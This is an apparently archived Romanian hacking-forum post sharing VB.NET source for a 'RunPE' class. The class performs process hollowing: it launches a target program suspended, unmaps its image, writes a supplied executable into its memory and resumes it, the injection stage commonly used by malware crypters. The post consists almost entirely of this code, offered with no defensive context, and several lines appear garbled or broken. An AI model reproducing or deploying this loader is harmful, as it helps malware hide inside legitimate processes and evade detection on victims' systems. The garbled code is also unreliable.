[VB.NET] t0fx RunPe

Arhiva forumului

Moderatori: Moderator Global, Administrator

Încuiat
Fabr3gas

Cod: Selectaţi tot

Class RunPE

    Public Const PAGE_NOCACHE As Long = &H200
    Public Const PAGE_EXECUTE_READWRITE As Long = &H40
    Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
    Public Const PAGE_EXECUTE_READ As Long = &H20
    Public Const PAGE_EXECUTE As Long = &H10
    Public Const PAGE_WRITECOPY As Long = &H8
    Public Const PAGE_NOACCESS As Long = &H1
    Public Const PAGE_READWRITE As Long = &H4
    Public Const PAGE_READONLY As System.UInt32 = &H2

    Shared Sub Execute(ByVal data() As Byte, ByVal target As String)
  Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags
  Dim GC = System.Runtime.InteropServices.GCHandle.Alloc(data, System.Runtime.InteropServices.GCHandleType.Pinned)
  Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
  Dim DH As New H.DOS_Header
  DH = System.Runtime.InteropServices.Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
  GC.Free()
  If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  Dim NH As New H.NT_Headers
  NH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + DH.Address), NH.GetType)
  Dim Address, Offset As Long, ret As UInteger
  SI.CB = Len(SI)
  C.Flags = 65538
  If NH.Signature <> 17744 Or DH.Magic <23117>= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then
    Dim ImageBase As System.UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
    If ImageBase <> 0 Then
    H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
    Offset = DH.Address + 248
    For I As Integer = 0 To NH.File.Sections - 1
    SH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + Offset + I * 40), SH.GetType)
    Dim Raw(SH.Size) As Byte
    For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
    H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
    H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address)
    Next I
    Dim T = BitConverter.GetBytes(ImageBase)
    H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret)
    C.Eax = ImageBase + NH.Optional.Address
    H.SetThreadContext(PI.Thread, C)
    H.ResumeThread(PI.Thread)
    End If
  End If
    End Sub

    Public Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
  RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
    End Function
    Public Shared Function vbLongToULong(ByVal Value As Long) As Double
  Const OFFSET_4 = 4294967296.0#
  If Value < 0 Then
    vbLongToULong = Value + OFFSET_4
  Else
    vbLongToULong = Value
  End If
    End Function

    Public Shared Function Protect(ByVal characteristics As Long) As Long
  Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
  PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
  PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
  Protect = mapping(RShift(characteristics, 29))
    End Function

    <System> Friend Class H
  <System> Structure Context
    Dim Flags, D0, D1, D2, D3, D6, D7 As System.UInt32, Save As Save
    Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As System.UInt32
    <System> Dim Registers As Byte()
  End Structure
  <System> Structure Save
    Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
    <System> Dim RegisterArea As Byte()
    Dim State As System.UInt32
  End Structure
  Structure Misc
    Dim Address, Size As System.UInt32
  End Structure
  Structure Section_Header
    Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As System.UInt32
  End Structure
  Structure Process_Information
    Dim Process, Thread As System.IntPtr, ProcessId, ThreadId As Integer
  End Structure
  <System> Structure Startup_Information
    Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
    Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
  End Structure
  <System> Structure Security_Flags
    Dim Length As Integer, Descriptor As System.IntPtr, Inherit As Integer
  End Structure
  <System> Structure DOS_Header
    Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As System.UInt16
    <System> Dim ReservedA As System.UInt16()
    Dim ID, Info As System.UInt16
    <System> Dim ReservedB As System.UInt16()
    Dim Address As System.Int32
  End Structure
  Structure NT_Headers
    Dim Signature As System.UInt32, File As File_Header, [Optional] As Optional_Headers
  End Structure
  <System> Structure File_Header
    Dim Machine, Sections As System.UInt16, Stamp, Table, Symbols As System.UInt32, Size, Flags As System.UInt16
  End Structure
  <System> Structure Optional_Headers
    Public Magic As System.UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As System.UInt32, SectionA, FileA As System.UInt32
    Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As System.UInt16, Version, SImage, SHeaders, Checksum As System.UInt32, Subsystem, Flags As System.UInt16
    Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As System.UInt32
    <System> Public DataDirectory As Data_Directory()
  End Structure
  <System> Structure Data_Directory
    Dim Address, Size As System.UInt32
  End Structure
  Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As System.UInt32, ByVal system As System.IntPtr, ByVal current As String, <System> ByRef startup As Startup_Information, <System> ByRef info As Process_Information) As Boolean
  Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal buffer As Byte(), ByVal size As System.IntPtr, <System> ByRef written As Integer) As Boolean
  Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByRef buffer As System.IntPtr, ByVal size As System.IntPtr, ByRef read As Integer) As Integer
  Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UIntPtr, ByVal [new] As System.UIntPtr, <System> ByVal old As System.UInt32) As Integer
  Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UInt32, ByVal type As System.UInt32, ByVal protect As System.UInt32) As System.IntPtr
  Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As System.IntPtr, ByVal address As System.IntPtr) As Long
  Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As System.IntPtr) As System.UInt32
  Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean
  Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean
    End Class
End Class
Sus
Încuiat

Înapoi la “Arhiva forum”